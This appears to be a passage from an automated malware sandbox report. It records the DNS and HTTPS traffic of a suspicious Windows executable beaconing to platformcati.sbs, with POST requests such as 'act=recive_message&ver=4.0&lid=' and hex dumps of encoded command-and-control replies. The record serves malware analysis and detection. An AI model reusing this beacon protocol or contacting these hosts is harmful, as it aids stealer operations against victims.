                                                                                      Jan 27, 2025 14:54:16.267350912 CET49705443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:16.267832041 CET49705443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:16.267858982 CET44349705104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:16.738859892 CET44349705104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:16.739156961 CET49705443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:16.741301060 CET49705443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:16.741306067 CET44349705104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:16.741540909 CET44349705104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:16.743546009 CET49705443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:16.743546009 CET49705443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:16.743585110 CET44349705104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:39.467259884 CET44349705104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:39.467365026 CET44349705104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:39.467535973 CET49705443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:39.467822075 CET49705443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:39.467840910 CET44349705104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:39.632251024 CET49838443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:39.632296085 CET44349838104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:39.632369995 CET49838443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:39.632669926 CET49838443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:39.632685900 CET44349838104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:40.121260881 CET44349838104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:40.121324062 CET49838443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:40.125057936 CET49838443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:40.125066042 CET44349838104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:40.125389099 CET44349838104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:40.134800911 CET49838443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:40.134989977 CET49838443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:40.135027885 CET44349838104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:40.135102034 CET49838443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:40.135108948 CET44349838104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:40.893589973 CET44349838104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:40.893680096 CET44349838104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:40.893722057 CET49838443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:40.893889904 CET49838443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:40.893907070 CET44349838104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:41.072587013 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:41.072639942 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:41.072715044 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:41.073204041 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:41.073219061 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:41.575906038 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:41.576040030 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:41.577672005 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:41.577687979 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:41.577939034 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:41.579087019 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:41.579212904 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:41.579247952 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:41.579324007 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:41.579335928 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:42.362199068 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:42.362304926 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:42.362477064 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:42.374114037 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:42.374146938 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:42.723128080 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:42.723197937 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:42.723280907 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:42.723656893 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:42.723675013 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:43.214184046 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:43.214282036 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:43.215285063 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:43.215306997 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:43.216335058 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:43.220967054 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:43.221081018 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:43.221122980 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:45.046622992 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:45.046715021 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:45.046788931 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:45.047036886 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:45.047053099 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:45.513175964 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:45.513217926 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:45.513290882 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:45.513607979 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:45.513621092 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.133275032 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.133394957 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.134836912 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.134845018 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.135890007 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.156229973 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.157104969 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.157186031 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.157366991 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.157428026 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.158066988 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.158133984 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.158472061 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.158502102 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.158629894 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.158667088 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.159006119 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.159034967 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.159044981 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.159058094 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.159159899 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.159188032 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.159204960 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.159323931 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.159360886 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.167706013 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.167855024 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.167885065 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.167922974 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.167932987 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.168001890 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.168019056 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.168090105 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.473634958 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.473763943 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.474025011 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.474025011 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.492146969 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.492198944 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.492290020 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.492604971 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.492620945 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.783835888 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.783869982 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.988239050 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.988317966 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.989905119 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.989917994 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.990248919 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.991606951 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.991714954 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.991750002 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:49.797132969 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:49.797240019 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:49.797322035 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:49.797506094 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:49.797522068 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:49.797535896 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:49.797540903 CET44349892104.21.112.1192.168.2.7
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 27, 2025 14:54:13.379336119 CET6132553192.168.2.71.1.1.1
                                                                                      Jan 27, 2025 14:54:13.391993046 CET53613251.1.1.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:49.800844908 CET5052753192.168.2.71.1.1.1
                                                                                      Jan 27, 2025 14:54:49.811139107 CET53505271.1.1.1192.168.2.7
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 27, 2025 14:54:13.379336119 CET192.168.2.71.1.1.10xb39aStandard query (0)platformcati.sbsA (IP address)IN (0x0001)false
                                                                                      Jan 27, 2025 14:54:49.800844908 CET192.168.2.71.1.1.10x9a5bStandard query (0)itsrevolutionmagnus.xyzA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 27, 2025 14:54:13.391993046 CET1.1.1.1192.168.2.70xb39aNo error (0)platformcati.sbs104.21.112.1A (IP address)IN (0x0001)false
                                                                                      Jan 27, 2025 14:54:13.391993046 CET1.1.1.1192.168.2.70xb39aNo error (0)platformcati.sbs104.21.32.1A (IP address)IN (0x0001)false
                                                                                      Jan 27, 2025 14:54:13.391993046 CET1.1.1.1192.168.2.70xb39aNo error (0)platformcati.sbs104.21.16.1A (IP address)IN (0x0001)false
                                                                                      Jan 27, 2025 14:54:13.391993046 CET1.1.1.1192.168.2.70xb39aNo error (0)platformcati.sbs104.21.96.1A (IP address)IN (0x0001)false
                                                                                      Jan 27, 2025 14:54:13.391993046 CET1.1.1.1192.168.2.70xb39aNo error (0)platformcati.sbs104.21.80.1A (IP address)IN (0x0001)false
                                                                                      Jan 27, 2025 14:54:13.391993046 CET1.1.1.1192.168.2.70xb39aNo error (0)platformcati.sbs104.21.48.1A (IP address)IN (0x0001)false
                                                                                      Jan 27, 2025 14:54:13.391993046 CET1.1.1.1192.168.2.70xb39aNo error (0)platformcati.sbs104.21.64.1A (IP address)IN (0x0001)false
                                                                                      Jan 27, 2025 14:54:49.811139107 CET1.1.1.1192.168.2.70x9a5bName error (3)itsrevolutionmagnus.xyznonenoneA (IP address)IN (0x0001)false
                                                                                      • platformcati.sbs
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.749702104.21.112.14437392C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-27 13:54:14 UTC263OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                      Data Ascii: act=life
                                                                                      2025-01-27 13:54:14 UTC554INHTTP/1.1 403 Forbidden
                                                                                      Date: Mon, 27 Jan 2025 13:54:14 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ytAmym0fDG84%2BuNPN9G4V3Rqn5msHjz4g%2FlpdzaN3F09tKJaR8IZSx5%2FGdW5Q52YGbKIR9uzHM7NF2oJkJpOrJIQwf563tdd%2BX90LASK1N12ukWzU1ZUtSPT3kRsVfAyzuLc"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 90893bc64a38424b-EWR
                                                                                      2025-01-27 13:54:14 UTC815INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                      Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                      2025-01-27 13:54:14 UTC1369INData Raw: 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63
                                                                                      Data Ascii: es/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('c
                                                                                      2025-01-27 13:54:14 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22
                                                                                      Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="
                                                                                      2025-01-27 13:54:14 UTC1003INData Raw: 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e
                                                                                      Data Ascii: f-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performan
                                                                                      2025-01-27 13:54:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.749703104.21.112.14437392C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-27 13:54:15 UTC353OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 42
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:15 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d
                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=
                                                                                      2025-01-27 13:54:15 UTC1126INHTTP/1.1 200 OK
                                                                                      Date: Mon, 27 Jan 2025 13:54:15 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=qpvhki1feci67og6ok6al04t23; expires=Fri, 23 May 2025 07:40:54 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wDPkC2YRmdLTmLmOwlvGAZgd50rw5tEXI2F4B3Rgo%2BTL5TAgj7xmmZyTSc5RblWrsiVRszjep058O1sn%2FIL4gfHitlYJEoj%2FZzq%2FFPiGA583QMFPxs%2BnSQ2PQ80ARbJ8IU1o"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 90893bce6d9843b3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1596&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1031&delivery_rate=1794714&cwnd=212&unsent_bytes=0&cid=a2d5ea389e56c420&ts=515&x=0"
                                                                                      2025-01-27 13:54:15 UTC243INData Raw: 33 65 34 36 0d 0a 70 39 65 67 64 42 54 64 6c 72 45 33 56 70 79 46 2f 51 58 54 54 2f 42 68 2f 52 48 5a 59 76 49 66 51 4f 34 66 31 77 53 4a 49 63 76 63 39 64 5a 57 4c 75 6d 36 6b 30 51 7a 76 72 2b 4a 64 36 59 71 33 45 4f 63 64 66 74 59 6c 48 34 73 6e 58 72 37 4a 76 39 4d 36 5a 32 78 77 52 68 6e 75 4c 71 54 55 69 36 2b 76 36 5a 2b 38 53 71 65 51 38 63 7a 76 41 69 51 66 69 79 4d 66 72 78 72 2b 55 32 6f 7a 37 76 48 48 48 47 2b 38 74 42 62 4f 2f 6e 67 6d 47 53 35 49 5a 6b 4d 6c 58 7a 37 54 74 42 36 4f 73 77 6c 39 55 6e 73 56 61 72 71 74 74 4d 66 4e 71 43 36 79 68 55 7a 38 71 66 48 4a 37 49 71 6b 67 32 62 64 62 49 4b 6d 6e 63 6b 6a 58 75 39 64 4f 42 48 6f 38 2b 31 78 42 31 37 74 2b 62 64 55 54 7a 79 35 70 4a 6b 38 57 50 53 42
                                                                                      Data Ascii: 3e46p9egdBTdlrE3VpyF/QXTT/Bh/RHZYvIfQO4f1wSJIcvc9dZWLum6k0Qzvr+Jd6Yq3EOcdftYlH4snXr7Jv9M6Z2xwRhnuLqTUi6+v6Z+8SqeQ8czvAiQfiyMfrxr+U2oz7vHHHG+8tBbO/ngmGS5IZkMlXz7TtB6Oswl9UnsVarqttMfNqC6yhUz8qfHJ7Iqkg2bdbIKmnckjXu9dOBHo8+1xB17t+bdUTzy5pJk8WPSB
                                                                                      2025-01-27 13:54:15 UTC1369INData Raw: 49 63 7a 34 30 44 44 54 79 47 64 62 4b 42 72 2b 30 58 70 32 76 76 62 56 6e 47 7a 74 49 73 56 50 50 4c 70 6d 6d 53 2b 4b 70 4d 44 6a 58 79 37 41 35 68 31 4a 6f 5a 79 75 6d 6e 6c 53 61 37 4e 76 4d 55 5a 63 62 66 79 33 46 5a 30 73 4b 65 59 66 2f 46 31 30 69 4f 50 63 4c 67 55 6e 57 78 69 6b 7a 4f 73 4a 75 78 50 36 5a 33 31 78 42 68 33 73 76 54 42 58 54 2f 31 34 6f 31 73 75 43 43 66 41 35 4a 35 74 41 4f 51 65 69 69 47 63 72 39 69 35 6b 36 76 78 62 57 43 57 44 61 34 37 4a 4d 4e 64 4e 33 69 6a 32 43 39 4f 39 41 35 33 32 7a 31 47 64 42 36 4c 73 77 6c 39 57 37 75 51 4b 72 4f 75 73 45 65 66 61 33 30 77 56 4d 35 2b 2f 57 5a 59 72 38 6e 6b 52 47 56 66 62 30 44 6d 58 59 72 69 58 71 78 4a 71 55 44 72 74 33 31 6d 6c 5a 58 73 76 2f 66 58 79 50 2b 70 34 41 70 71 47 32 56
                                                                                      Data Ascii: Icz40DDTyGdbKBr+0Xp2vvbVnGztIsVPPLpmmS+KpMDjXy7A5h1JoZyumnlSa7NvMUZcbfy3FZ0sKeYf/F10iOPcLgUnWxikzOsJuxP6Z31xBh3svTBXT/14o1suCCfA5J5tAOQeiiGcr9i5k6vxbWCWDa47JMNdN3ij2C9O9A532z1GdB6Lswl9W7uQKrOusEefa30wVM5+/WZYr8nkRGVfb0DmXYriXqxJqUDrt31mlZXsv/fXyP+p4ApqG2V
